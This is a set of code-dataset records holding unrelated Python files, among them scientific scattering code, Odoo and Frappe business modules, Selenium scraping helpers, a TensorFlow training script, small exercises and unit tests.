np.random.normal(normsignal * norm, scale=self.error_factor)\n meta = {'Energy': self.Energy}\n if self.Energy is not None:\n self.output_params['simulated_w_err_%.4fkeV' % self.Energy] = {'x': self.x, 'y': sqerr * minsignal,\n 'yerr': np.sqrt(\n normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n else:\n self.output_params['simulated_w_err'] = {'x': self.x, 'y': sqerr * minsignal,\n 'yerr': np.sqrt(normsignal) * minsignal * self.error_factor,\n 'meta': meta}\n dr, rdist, totalR = self.calc_Rdist(tuple(self.__R__), self.Rsig, self.dist, self.Np)\n self.output_params['Distribution'] = {'x': dr, 'y': rdist}\n self.output_params['Total'] = {'x': self.x, 'y': sqf}\n self.output_params['Resonant-term'] = {'x': self.x, 'y': asqf}\n self.output_params['SAXS-term'] = {'x': self.x, 'y': eisqf}\n self.output_params['Cross-term'] = {'x': self.x, 'y': csqf}\n self.output_params['rho_r'] = {'x': rhor[:, 0], 'y': rhor[:, 1]}\n self.output_params['eirho_r'] = {'x': eirhor[:, 0], 'y': eirhor[:, 1]}\n self.output_params['adensity_r'] = {'x': adensityr[:, 0], 'y': adensityr[:, 1]}\n self.output_params['Structure_Factor'] = {'x': self.x, 'y': struct}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__Rmoles__[:-1])\n self.output_params['Rmoles_radial'] = {'x':xtmp , 'y': ytmp}\n sqf = self.output_params[self.term]['y']\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__RzRatio__[:-1])\n self.output_params['RzRatio_radial'] = {'x': xtmp, 'y': ytmp}\n xtmp, ytmp = create_steps(x=self.__R__[:-1], y=self.__density__[:-1])\n self.output_params['Density_radial'] = {'x': xtmp, 'y': ytmp}\n sqf = self.output_params[self.term]['y']\n return sqf\n\n\nif __name__=='__main__':\n x=np.logspace(-3,0.0,200)\n fun=Ellipsoid_Uniform(x=x)\n print(fun.y())\n","sub_path":"Functions/ASAXS/Ellipsoid_Uniform.py","file_name":"Ellipsoid_Uniform.py","file_ext":"py","file_size_in_byte":20064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"572852649","text":"#-*- coding:utf-8 -*-\n# Part of Odoo. 
See LICENSE file for full copyright and licensing details.\n\nimport time\nfrom datetime import datetime, timedelta\nfrom dateutil import relativedelta\n\nimport babel\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tools.safe_eval import safe_eval\n\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, AccessError\n\n\nimport logging\n_logger = logging.getLogger(__name__)\n\nclass OrveaCrmLead(models.Model):\n _inherit = 'crm.lead'\n\n\n flag_crm = fields.Boolean(string='Flag', help='Flag' , default=False)\n state_crm = fields.Selection([\n\t('refused', 'Refuse'),\n\t('accepted', 'Accepte'),\n\t('quotation_sent', 'Devis envoye'),\n\t('meeting', 'Rendez-vous prevu'),\n ('contacted', 'Contacte'),\n ('new', 'Nouveau'),\n\t],string=\"State\", default='new')\n activity = fields.Char()\n source = fields.Selection([\n ('inconnu', 'Inconnu'),\n ('evenement', 'Evenement'),\n ('facebook', 'Facebook'),\n ('mailing', 'Mailing'),\n ('reference', 'Reference'),\n ('site_web', 'Site Web'),\n ('autres', 'Autres'),\n ], string='Source')\n\n responsable_id = fields.Many2one('res.partner', string='Responsable',\n help=\"Linked responsable (optional). Usually created when converting the lead.\")\n\n\n @api.model\n def create(self, vals):\n vals['flag_crm'] = True\n return super(OrveaCrmLead, self).create(vals)\n\n\n\n\n\n","sub_path":"orvea_module/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"195544153","text":"import time\nimport copy\nimport numpy as np\nimport sqlite3\nfrom ctypes import windll\n\n\n# import Selenium framework\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.common.exceptions import *\nfrom selenium.webdriver.chrome.options import Options\n\n\n# Given the record information,Return a browser containing the index page (Max trials time = 5)\ndef init_browser(headless=False,\n\t\t\t\t chrome_driver_path='C:\\\\Users\\\\KevinZhu\\\\PycharmProjects\\\\selenium drivers\\\\chromedriver.exe'):\n\n\t\"\"\"\n\tuser32 = windll.user32\n\tgdi32 = windll.gdi32\n\tdc = user32.GetDC(None)\n\tdesktop_width = gdi32.GetDeviceCaps(dc, 8)\n\tdesktop_height = gdi32.GetDeviceCaps(dc, 10)\n\tbrowser_width = desktop_width // 2\n\tbrowser_height = desktop_height - 40\n\t\"\"\"\n\n\tchrome_options = Options()\n\tchrome_options.add_argument(\"--window-size=1920x1080\")\n\tif headless:\n\t\tchrome_options.add_argument(\"--headless\")\n\n\tbrowser = webdriver.Chrome(chrome_options=chrome_options, executable_path=chrome_driver_path)\n\n\t\"\"\"\n\tbrowser.set_window_position(x=0, y=0, windowHandle='current')\n\tbrowser.set_window_size(browser_width, browser_height, windowHandle='currentWindow')\n\t\"\"\"\n\n\thandles = browser.window_handles\n\tif len(handles) > 1:\n\t\tbrowser.switch_to.window(handles[1])\n\t\tbrowser.close()\n\t\tbrowser.switch_to.window(handles[0])\n\n\treturn browser\n\n\ndef table_to_2d_nparray(table_elem, by_line=False):\n\ttheads = table_elem.find_elements_by_xpath('./thead')\n\ttbody = table_elem.find_element_by_xpath('./tbody')\n\ttry:\n\t\trows = WebDriverWait(tbody, 5).until(ec.presence_of_all_elements_located((By.XPATH, './tr')))\n\t\tif by_line:\n\t\t\tif len(theads) > 
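init_browser above toggles headless Chrome through an Options object; the minimal pattern, matching the Selenium 3 style the record uses (the driver path is hypothetical):

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

opts = Options()
opts.add_argument("--window-size=1920x1080")
opts.add_argument("--headless")   # omit this line to watch the browser
browser = webdriver.Chrome(chrome_options=opts,
                           executable_path="/path/to/chromedriver")
browser.get("https://example.com")
browser.quit()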
0:\n\t\t\t\ttable = np.empty([len(rows) + 1, 1], dtype=object)\n\t\t\t\ttable[0, 0] = theads[0].text\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttable[i + 1, 0] = rows[i].text\n\t\t\telse:\n\t\t\t\ttable = np.empty([len(rows), 1], dtype=object)\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttable[i, 0] = rows[i].text\n\t\telse:\n\t\t\tcols = [col.text for col in rows[0].find_elements_by_xpath('./td')]\n\t\t\tif len(theads) > 0:\n\t\t\t\ttable = np.empty([len(rows) + 1, len(cols)], dtype=object)\n\t\t\t\ttokens = theads[0].find_elements_by_xpath('./tr/th')\n\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\ttable[0, j] = tokens[j].text\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttokens = rows[i].find_elements_by_xpath('./td')\n\t\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\t\ttable[i + 1, j] = tokens[j].text\n\t\t\telse:\n\t\t\t\ttable = np.empty([len(rows), len(cols)], dtype=object)\n\t\t\t\tfor i in range(len(rows)):\n\t\t\t\t\ttokens = rows[i].find_elements_by_xpath('./td')\n\t\t\t\t\tfor j in range(len(tokens)):\n\t\t\t\t\t\ttable[i, j] = tokens[j].text\n\texcept Exception as e:\n\t\tprint('Error in scratching table elements: ', e)\n\t\ttable = None\n\treturn table\n\n\ndef table_to_dict(table_array, period_type):\n\ttd = {}\n\trows = table_array.shape[0]\n\tcols = table_array.shape[1]\n\tfor i in range(1, cols):\n\t\td = {}\n\t\tfor j in range(1, rows):\n\t\t\tif table_array[j, i] is not None:\n\t\t\t\tif table_array[j, i] == '-':\n\t\t\t\t\td[table_array[j, 0]] = 0.0\n\t\t\t\telse:\n\t\t\t\t\td[table_array[j, 0]] = float(table_array[j, i].replace(',', ''))\n\t\ttd[table_array[0, i]] = copy.deepcopy(d)\n\treturn td\n\n\n\n","sub_path":"modules/selenium_wrapper_methods.py","file_name":"selenium_wrapper_methods.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"119735820","text":"# Copyright (c) 2013, Komal and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\n\nfrom typing import Dict, List\n\nimport frappe\nfrom frappe import _\n\nfrom accounting.accounting.report.profit_and_loss.profit_and_loss import \\\n\tget_date_filter\n\n\ndef get_voucher_filter(filters: Dict = None) -> Dict:\n\tvoucher_no = filters.get('voucher_no')\n\tvoucher_type = filters.get('voucher_type')\n\tret = {}\n\tif voucher_type:\n\t\tret.update({\"voucher_type\": voucher_type})\n\tif voucher_no:\n\t\tret.update({\"voucher_no\": voucher_no})\n\treturn ret\n\n\ndef get_general_ledger_data(filters: Dict = None) -> List[Dict]:\n\tdate_filter = get_date_filter(filters)\n\tvoucher_filter = get_voucher_filter(filters)\n\tgl_entries = frappe.get_list(\n\t\t\"GL Entry\",\n\t\tfilters={\n\t\t\t**date_filter,\n\t\t\t**voucher_filter\n\t\t},\n\t\tfields=['account', 'debit', 'credit', 'voucher_no', 'voucher_type'],\n\t)\n\n\tdata = gl_entries\n\treturn data\n\n\ndef execute(filters=None):\n\tdata = get_general_ledger_data(filters)\n\tcolumns = [{\n\t\t\"fieldname\": \"account\",\n\t\t\"label\": _(\"Account\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"debit\",\n\t\t\"label\": _(\"Debit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"credit\",\n\t\t\"label\": _(\"Credit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"voucher_no\",\n\t\t\"label\": _(\"Debit\"),\n\t\t\"width\": 100\n\t}, {\n\t\t\"fieldname\": \"voucher_type\",\n\t\t\"label\": _(\"Voucher Type\"),\n\t\t\"width\": 200\n\t}]\n\treturn columns, 
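table_to_dict above normalizes scraped cells by stripping thousands separators and treating '-' as nil; that parsing step on its own:

def parse_cell(text):
    # Scraped financial tables use ',' as a thousands separator and '-' for nil.
    return 0.0 if text == '-' else float(text.replace(',', ''))

assert parse_cell('-') == 0.0
assert parse_cell('1,234.5') == 1234.5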
data\n","sub_path":"accounting/accounting/report/general_ledger/general_ledger.py","file_name":"general_ledger.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"502349014","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/mtrax/colormapk.py\n# Compiled at: 2008-01-29 20:48:29\nimport matplotlib, numpy, matplotlib.colors\n\ndef colormap_image(imin, cmap=None, cbounds=None):\n assert imin.ndim <= 2\n if cmap is None:\n cmap = matplotlib.cm.jet\n assert isinstance(cmap, matplotlib.colors.Colormap)\n im = imin.astype(numpy.double)\n if cbounds is not None:\n assert len(cbounds) == 2\n assert cbounds[0] <= cbounds[1]\n im = im.clip(cbounds[0], cbounds[1])\n im -= im.min()\n im /= im.max()\n im *= cmap.N - 1.0\n im = im.round()\n im = im.astype(int)\n rgb = cmap(im)\n rgb = rgb[:, :, :-1]\n rgb *= 255\n rgb = rgb.astype(numpy.uint8)\n return rgb","sub_path":"pycfiles/Mtrax-2.2.07-py2.5-linux-i686/colormapk.py","file_name":"colormapk.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"130038126","text":"import unittest\nfrom urllib.request import urlopen\nfrom extracteur import*\n\n\nclass TestExtracteur(unittest.TestCase):\n bs = None\n \n def test_extracteur(self): #Fonction qui test le nombre de tableaux récupérés, si il est égal à 7 pour cet exemple, alors l'extracteur fonctionne correctement\n TestExtracteur.bs = BeautifulSoup(urlopen('https://en.wikipedia.org/wiki/New_York_City'), 'html.parser')\n TestTableau = TestExtracteur.bs.find_all('table',class_='wikitable')\n TestNbTab = len(TestTableau) \n \n self.assertTrue(TestTableau)\n self.assertEqual(TestNbTab,7)\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"test_extracteur.py","file_name":"test_extracteur.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211196554","text":"\"\"\"\n@author: Jose Antonio Cervan Garcia\n\nNumber letter counts\n\nProblem 17\n\nIf the numbers 1 to 5 are written out in words: one, two, three, four, five,\nthen there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n\nIf all the numbers from 1 to 1000 (one thousand) inclusive were written out in\nwords, how many letters would be used?\n\nNOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-two)\ncontains 23 letters and 115 (one hundred and fifteen) contains 20 letters. 
The use\nof \"and\" when writing out numbers is in compliance with British usage.\n\"\"\"\n\ndef numLetterCounter(n):\n data = {1:\"One\", 2:\"Two\", 3:\"Three\", 4:\"Four\", 5:\"Five\", 6:\"Six\", 7:\"Seven\", 8:\"Eight\", 9:\"Nine\", 10:\"Ten\",\n 11:\"Eleven\", 12:\"Twelve\", 13:\"Thirteen\",14:\"Fourteen\", 15:\"Fifteen\", 16:\"Sixteen\", 17:\"Seventeen\", 18:\"Eighteen\", 19:\"Nineteen\",\n 20:\"Twenty\", 30:\"Thirty\", 40:\"Forty\", 50:\"Fifty\",60:\"Sixty\", 70:\"Seventy\", 80:\"Eighty\", 90:\"Ninety\",\n 100:\"Hundred\",\n 1000:\"Thousand\"}\n \n if n < 100:\n \n if n in data:\n print(data[n], n)\n return len(data.get(n))\n \n dozens = n // 10\n data[n] = data[dozens * 10] + data[n % 10]\n print(data[n], n)\n return len(data.get(n))\n \n if n <= 1000:\n \n thousands = n // 1000\n hundreds = n // 100\n #dozens = (n - hundreds * 100) // 10\n #units = (n - hundreds * 100) % 10\n \n if n % 1000 == 0:\n data[n] = data[thousands] + data[1000]\n elif n % 100 == 0:\n data[n] = data[hundreds] + data[100]\n elif n % 100 <= 20:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100]\n elif n % 10 == 0:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100]\n else:\n data[n] = data[hundreds] + data[(hundreds * 100) // hundreds] + 'And' + data[n % 100 - n % 10] + data[n % 10]\n\n print(data[n], n)\n return len(data.get(n))\n\n###############################################################################\ntop = 1000\n\nletters = 0\n\nfor i in range(1, top + 1):\n letters += numLetterCounter(i)\n \nprint(\"\\nletters = \", letters)\n","sub_path":"problems/#0017.py","file_name":"#0017.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"908241","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom Lib import *\n\n\ntry:\n # 获取输入输出文件名\n input_file = sys.argv[1]\n output_file = sys.argv[2]\n\n # 数据初始化\n characters = 0\n words = 0\n lines = 0\n count = {}\n\n # 打开输入文件\n with open(input_file, encoding='utf-8', newline='') as f:\n for line in f:\n line = line.lower()\n\n # 统计每行字符数\n characters += count_character(line)\n\n # 统计非空白行数\n if not line.isspace():\n lines += 1\n\n # 统计每行单词数\n words += count_word(line, count)\n\n # 打开输出文件\n with open(output_file, 'w', encoding='utf-8', newline='') as f:\n f.write(\"characters: {0}\\n\".format(characters))\n f.write(\"words: {0}\\n\".format(words))\n f.write(\"lines: {0}\\n\".format(lines))\n\n # 输出最多的10个单词及其词频\n result = count_most(count)\n for k, v in result.items():\n f.write(\"{0}: {1}\\n\".format(k, v))\n\nexcept IndexError:\n print(\"未指明输入/输出文件\")\nexcept FileNotFoundError:\n print(\"找不到输入文件{0}\".format(input_file))\nexcept:\n info = sys.exc_info()\n print(info[1])\n","sub_path":"W_C/福大2021W班C++仓库运行结果/111801429/src/WordCount.py","file_name":"WordCount.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"71188219","text":"\"\"\"\nExpliquei o que é decorator e padrões de projeto. Crie um decorator que mostre\no tempo de execução de uma função que soma 4 números aleatórios. 
(2,0)\n\"\"\"\nimport datetime\nfrom random import randint\nimport time\n\n\ndef operacoes(dados):\n\n def meu_metodo():\n print(\"Tempo inicial de processo: \", datetime.datetime.now())\n print(\"Iniciando programa de operacoes...\")\n time.sleep(2)\n dados()\n print(\"Finalizando processo.\")\n print(\"Tempo final de processo: \", datetime.datetime.now())\n\n return meu_metodo\n\n@operacoes\ndef cria_dados():\n cadeia_num = []\n for n in range(4):\n cadeia_num.append(randint(0,1000))\n print(cadeia_num)\n print(\"A soma dos 4 números é igual a: \", sum(cadeia_num))\n\ncria_dados()","sub_path":"N1_exercicio_04.py","file_name":"N1_exercicio_04.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"161331777","text":"#!/usr/bin/env python3\n\n\"\"\" exit 1 if file[s] contain trailing whitespace. Report the offending lines.\n\n\"\"\"\nimport logging\nimport string\nimport sys\n\nlogging.basicConfig(level=logging.DEBUG)\n\nif len(sys.argv) < 2:\n sys.stderr.write(__doc__)\n sys.exit(2)\n\nexitflag = 0\nfor filename in sys.argv[1:]:\n with open(filename) as f:\n for line_number, line, in enumerate(f):\n if len(line) < 2:\n continue\n if line[-2] in string.whitespace:\n exitflag = 1\n # list of lines is zero indexed, but the first line of a file\n # is conventionally line 1, hence the +1\n print('{} L:{} : trailing whitespace'.format(\n filename,\n line_number + 1\n ))\n\nsys.exit(exitflag)\n","sub_path":"tools/trailing_whitespace.py","file_name":"trailing_whitespace.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"129539940","text":"high = 100\nlow = 0\nnum = 50\n\n\ndef average(high, low):\n num = int((high + low) / 2)\n return num\n\n\nprint(\"Please think of a number between 0 and 100!\")\n\n\nwhile True:\n print(\"Is your secret number %s?\" % num)\n user = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly. \")\n if user == 'h':\n high = num\n num = average(high, low)\n if user == 'l':\n low = num\n num = average(high, low)\n if user == 'c':\n print(\"Game over. Your secret number was: %s\" % num)\n break\n\n\n\n# class Guess:\n#\n# def __init__(self):\n# self.high = 100\n# self.input = ''\n# self.low = 0\n# self.average()\n# self.hint()\n# self.bisect()\n#\n# def average(self):\n# self.ans = (self.high + self.low) / 2\n#\n# def bisect(self):\n# while True:\n# if self.input == 'c':\n# print(\"Game over. Your secret number was: %s\" % self.ans)\n# exit()\n# elif self.input == 'h':\n# self.high = self.ans\n# self.average()\n# self.hint()\n# elif self.input == 'l':\n# self.low = self.ans\n# self.average()\n# self.hint()\n# else:\n# print(\"Sorry, I did not understand your input.\")\n# self.hint()\n#\n# def hint(self):\n# print(\"Is your secret number %s?\" % round(self.ans))\n# self.input = input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. 
Enter 'c' to indicate I guessed correctly.\\n\")\n#\n# print(\"Please think of a number between 0 and 100!\")\n# guess = Guess()\n","sub_path":"files/python/newGuessGame.py","file_name":"newGuessGame.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61232810","text":"import numpy as np\nimport tensorflow as tf\nimport os\nimport time\nimport ops\nimport data_buscrowd_fuzzy as data_buscrowd\nimport matplotlib.pyplot as plt\n# from model import model\n# from networks.mymodel_with_offset import model as model\nfrom networks.resnet_with_offset import resnet_v2_152 as model\n# from networks.google_v3 import inception_v3 as model\n\nos.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\nos.environ['CUDA_VISIBLE_DEVICES'] = '2,3'\n\nMAX_STEP=10000\nBATCH_SIZE=32\nlogs_train_dir='output/'\n\ndef save_list(data_list,name='result.txt'):\n fp = open(name, 'w+')\n for i in range(len(data_list)):\n fp.write(str(data_list[i]))\n fp.write(\" \")\n fp.close()\n\ndef remove_output():\n path = 'output/'\n for i in os.listdir(path):\n path_file = os.path.join(path, i)\n if os.path.isfile(path_file):\n os.remove(path_file)\n\ndef check_weights(sess,scope_name,tensor_name):\n with tf.variable_scope(scope_name,reuse=True):\n tensor = tf.get_variable(tensor_name)\n val=sess.run(tensor)\n print(tensor_name,val.shape,val)\n return val\n\ndef train():\n remove_output()\n is_training = tf.placeholder(tf.bool, shape=())\n train_img,train_lable=data_buscrowd.get_train_data(batch_size=BATCH_SIZE)\n test_img,test_lable=data_buscrowd.get_test_data(batch_size=BATCH_SIZE)\n x=tf.cond(is_training, lambda: train_img, lambda: test_img)\n y=tf.cond(is_training, lambda: train_lable, lambda: test_lable)\n logits=model(x,num_classes=4)\n losses=ops.loss_with_offset_fuzzy(logits,y)\n acc=ops.evaluationwith_offset_fuzzy_label(logits,y)\n step_ = tf.Variable(tf.constant(0))\n learing_rate = tf.train.exponential_decay(\n learning_rate=0.001, global_step=step_, decay_steps=100, decay_rate=0.8, staircase=True)\n\n train_op=ops.optimize_adam(losses,learing_rate)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n max_acc=0\n try:\n total_loss=[]\n total_acc=[]\n total_test_acc=[]\n plt.ion() # 开启interactive mode 成功的关键函数\n for step in np.arange(MAX_STEP):\n if coord.should_stop():\n break\n _,val_loss,val_acc,val_logits,val_lable,val_lr = sess.run([train_op,losses,acc,logits,y,learing_rate], feed_dict={is_training: True,step_:step})\n if step % 10 == 0:\n val_loss_test, val_acc_test = sess.run([losses, acc], feed_dict={is_training: False})\n total_loss.append(val_loss)\n total_acc.append(val_acc)\n total_test_acc.append(val_acc_test)\n print('\\n',step,' lr:',val_lr,' loss:',val_loss)\n print(' ','acc:',val_acc)\n print('eg:',val_logits[0],val_lable[0])\n val_logits=np.argmax(val_logits,1)\n print(val_logits-val_lable[:,0])\n plt.subplot(211)\n plt.plot(total_loss,'-r')\n plt.subplot(212)\n plt.plot(total_acc,'-y')\n plt.plot(total_test_acc,'-g')\n plt.pause(0.1)\n # check_weights( sess,'conv1','weight')\n if step % 500 == 0 or (step + 1) == MAX_STEP:\n if(val_acc>max_acc):\n max_acc=val_acc\n checkpoint_path = os.path.join(logs_train_dir, 'model_'+str(max_acc)+'.ckpt')\n saver.save(sess, checkpoint_path, global_step=step)\n 
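The guessing game above halves [low, high] each round, so any secret in 0..100 is pinned down quickly; a sketch with the standard closed-interval bisection (the record's update, which lacks the +/- 1 steps, relies on the human answering 'c' to terminate):

def steps_to_find(secret, lo=0, hi=100):
    # Each wrong answer halves the range, so 0..100 needs at most
    # ceil(log2(101)) = 7 guesses.
    steps = 0
    while lo <= hi:
        steps += 1
        guess = (lo + hi) // 2
        if guess == secret:
            return steps
        if guess < secret:
            lo = guess + 1
        else:
            hi = guess - 1

assert max(steps_to_find(s) for s in range(101)) == 7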
save_list(total_acc,'acc_fuzzy.txt')\n save_list(total_test_acc,'test_acc_fuzzy.txt')\n save_list(total_loss,'loss_fuzzy.txt')\n except tf.errors.OutOfRangeError:\n print('Done training epoch limit reached')\n finally:\n coord.request_stop()\n coord.join(threads)\n sess.close()\n\ndef test():\n log_dir='output/'\n is_training = tf.placeholder(tf.bool, shape=())\n train_img, train_lable = data_buscrowd.get_train_data(batch_size=BATCH_SIZE)\n test_img, test_lable = data_buscrowd.get_test_data(batch_size=BATCH_SIZE)\n x = tf.cond(is_training, lambda: train_img, lambda: test_img)\n y = tf.cond(is_training, lambda: train_lable, lambda: test_lable)\n logits = model(x, num_classes=4)\n losses = ops.loss_with_offset_fuzzy(logits, y)\n acc = ops.evaluationwith_offset_fuzzy_label(logits, y)\n saver = tf.train.Saver()\n with tf.Session() as sess:\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n ckpt = tf.train.get_checkpoint_state(log_dir)\n if ckpt and ckpt.model_checkpoint_path:\n global_step = ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1]\n saver.restore(sess, ckpt.model_checkpoint_path)\n else:\n print('No checkpoint')\n acc_total=[]\n cls_matrix=np.zeros([4,4])\n try:\n for i in range(20):\n val_loss,val_acc,val_logits,val_y = sess.run([losses,acc,logits,y], feed_dict={is_training: False})\n print(np.hstack((val_logits,val_y)))\n max_index = np.argmax(val_logits,1)\n # for j in range(32):\n # cls_matrix[val_y[j],max_index[j]]+=1\n acc_total.append(val_acc)\n print(val_acc)\n except tf.errors.OutOfRangeError:\n print('Done test epoch limit reached')\n finally:\n coord.request_stop()\n coord.join(threads)\n sess.close()\n return np.average(acc_total),cls_matrix\n\nif __name__=='__main__':\n train()\n # print(test())","sub_path":"train_fuzzy.py","file_name":"train_fuzzy.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211386489","text":"import cv2 as cv\r\nimport numpy as np\r\nimport sys\r\n\r\ndef main():\r\n fname = sys.argv[1]\r\n im = cv.imread(fname)\r\n\r\n shape = list(im.shape)\r\n shape[-1] += 1 # to include alpha channel\r\n\r\n a = np.zeros(shape)\r\n\r\n white = np.array([255, 255, 255])\r\n tp = np.array([255, 255, 255, 0])\r\n\r\n for i in range(im.shape[0]):\r\n for j in range(im.shape[1]):\r\n if all(im[i][j] == white): a[i][j] = tp\r\n else:\r\n a[i][j][:-1] = im[i][j]\r\n a[i][j][-1] = 255\r\n\r\n fname = fname.split('.')[0] + '_no_background.png'\r\n cv.imwrite(fname, a)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"no_background.py","file_name":"no_background.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"220202459","text":"print(\"Enter your string\")\nmy_str = input()\n\n# make function for print in differnet cases\ndef all_cases(def_str):\n camel_case(def_str)\n cabab_case(def_str)\n snake_case(def_str)\n\n# Function for cabab case\ndef cabab_case(def_str):\n case = \"-\"\n other_case(def_str,case)\n\n# Function for snake case\ndef snake_case(def_str):\n case = \"_\"\n other_case(def_str,case)\n\n# Function for camel case\ndef camel_case(def_str):\n case_str = \"\"\n temp_str = \"\"\n char = 0\n while char < len(def_str):\n if def_str[char] == \" \":\n temp_str = def_str[char+1].upper()\n case_str += temp_str\n char += 2\n else:\n case_str += def_str[char].lower()\n char += 1\n 
print(case_str)\n\n# Function for defaual case for cabab and snake\ndef other_case(def_str,case):\n case_str = \"\"\n temp_str = \"\"\n char = 0\n while char < len(def_str):\n if def_str[char] == \" \":\n case_str += case\n char += 1\n else:\n case_str += def_str[char].lower()\n char += 1\n print(case_str)\n\nall_cases(my_str)","sub_path":"submissions/sm_115_suyash/week_13/day_5/strings_play.py","file_name":"strings_play.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"632463520","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n hashtable=dict()\n for i ,num in enumerate(nums):\n if target-num in hashtable:\n return [hashtable[target-num],i]\n hashtable[nums[i]]=i\n return []\na=Solution()\nb=[2,5,5,11]\nc=a.twoSum(b,10)\nprint(c)\n","sub_path":"Week2/两数之和哈希表实现.py","file_name":"两数之和哈希表实现.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"17191499","text":"#!/usr/bin/python3\n\"\"\"\nThis module contains the test cases for Square\n\"\"\"\nimport unittest\nimport pep8\nfrom models.base import Base\nfrom models.rectangle import Rectangle\nfrom models.square import Square\nfrom contextlib import contextmanager\nimport json\nimport sys\nimport os\nfrom io import StringIO\n\n\nclass TestSquareClass(unittest.TestCase):\n \"\"\"\n This class contains the test methods\n \"\"\"\n @classmethod\n def setUpClass(cls):\n \"\"\"\n sets up at beginning of class\n \"\"\"\n Base._Base__nb_objects = 0\n cls.test = Square(10)\n cls.test1 = Square(1, 2, 5)\n cls.test2 = Square(5, 9, 8, 9)\n cls.test3 = Square(3, 8, 3, 4)\n\n def setUp(self):\n \"\"\"\n resets variables\n \"\"\"\n r1 = r2 = output = temp = 0\n\n def test_doctest(self):\n \"\"\"\n test for docstring\n \"\"\"\n self.assertIsNotNone(Base.__doc__)\n\n def test_class(self):\n \"\"\"\n tests for class\n \"\"\"\n self.assertTrue(isinstance(self.test, Square))\n\n def test_class_inheritance(self):\n \"\"\"\n test for base inheritence\n \"\"\"\n self.assertTrue(issubclass(type(self.test), Base))\n\n def test_pep8_model(self):\n \"\"\"\n Tests for pep8\n \"\"\"\n style = pep8.StyleGuide(quiet=True)\n pepp = style.check_files(['models/square.py'])\n self.assertEqual(pepp.total_errors, 0, \"fix pep8\")\n\n def test_pep8_test(self):\n \"\"\"\n Tests for pep8\n \"\"\"\n style = pep8.StyleGuide(quiet=True)\n pepp = style.check_files(['tests/test_models/test_square.py'])\n 